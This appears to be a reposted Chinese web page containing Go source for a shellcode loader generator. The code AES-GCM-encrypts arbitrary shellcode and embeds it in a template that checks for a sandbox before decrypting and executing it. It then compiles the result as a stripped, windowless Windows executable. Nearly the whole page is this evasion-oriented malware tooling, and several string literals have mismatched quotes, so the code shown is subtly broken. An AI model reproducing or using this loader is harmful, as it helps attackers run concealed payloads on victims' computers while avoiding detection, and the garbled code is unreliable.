• 日期: 2026-05-16 06:25:15
  • 标签: 常规

package main

import ( "crypto/aes" "crypto/cipher" "crypto/rand" "encoding/base64" "fmt" "gld/detect" "gld/loader" "gld/util" "io/ioutil" "os" "os/exec" )

var template = `package main

import ( "crypto/aes" "crypto/cipher" "encoding/base64" "gld/detect" "gld/loader" "gld/util" )

func main() { if !detect.ContinueRun() { return }

key, _ := base64.StdEncoding.DecodeString('%s')
nonce, _ := base64.StdEncoding.DecodeString('%s')
buf, _ := base64.StdEncoding.DecodeString('%s')

block, err := aes.NewCipher(key)
if err != nil {
	panic(err.Error())
}

aesgcm, err := cipher.NewGCM(block)
if err != nil {
	panic(err.Error())
}

plaintext, err := aesgcm.Open(nil, nonce, buf, nil)
if err != nil {
	panic(err.Error())
}

loader.X(plaintext)

} `

const TEMP = "temp.go"

func main() { if len(os.Args) < 2 { println("./gld shellcode.bin [x64/x86]") return }

f := os.Args[1]
raw, err := ioutil.ReadFile(f)
if err != nil {
	println("[!] ' + err.Error())
	return
}

key := make([]byte, 32)
nonce := make([]byte, 12)
rand.Read(key)
rand.Read(nonce)

block, err := aes.NewCipher(key)
if err != nil {
	println("[!] ' + err.Error())
	return
}

aesgcm, err := cipher.NewGCM(block)
if err != nil {
	println("[!] ' + err.Error())
	return
}

raw = aesgcm.Seal(nil, nonce, raw, nil)

err = ioutil.WriteFile(
	TEMP,
	[]byte(fmt.Sprintf(
		template,
		base64.StdEncoding.EncodeToString(key),
		base64.StdEncoding.EncodeToString(nonce),
		base64.StdEncoding.EncodeToString(raw))),
	0777,
)
if err != nil {
	println("[!] Generate fail: ' + err.Error())
	return
}
println("[*] Generate template")

var arch string
if len(os.Args) > 2 {
	arch = os.Args[2]
} else {
	arch = "x64"
}

var output string
switch arch {
case "x64":
	os.Setenv("GOARCH", "amd64")
	output = "x64.exe"
case "x86":
	os.Setenv("GOARCH", "386")
	output = "x86.exe"
default:
	println("[!] Unknown arch")
	return
}
println("[*] Compiling ' + output)

err = exec.Command("go", "build", "-ldflags", "-w -s -H=windowsgui", "-o", output, TEMP).Run()
if err != nil {
	println("[!] Compile fail: ' + err.Error())
	return
}

println("[+] Generate successfully -> ' + output)

}

Golang AES加密Base64编码Shellcode生成工具

原文地址: https://www.cveoy.top/t/topic/lPeW 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录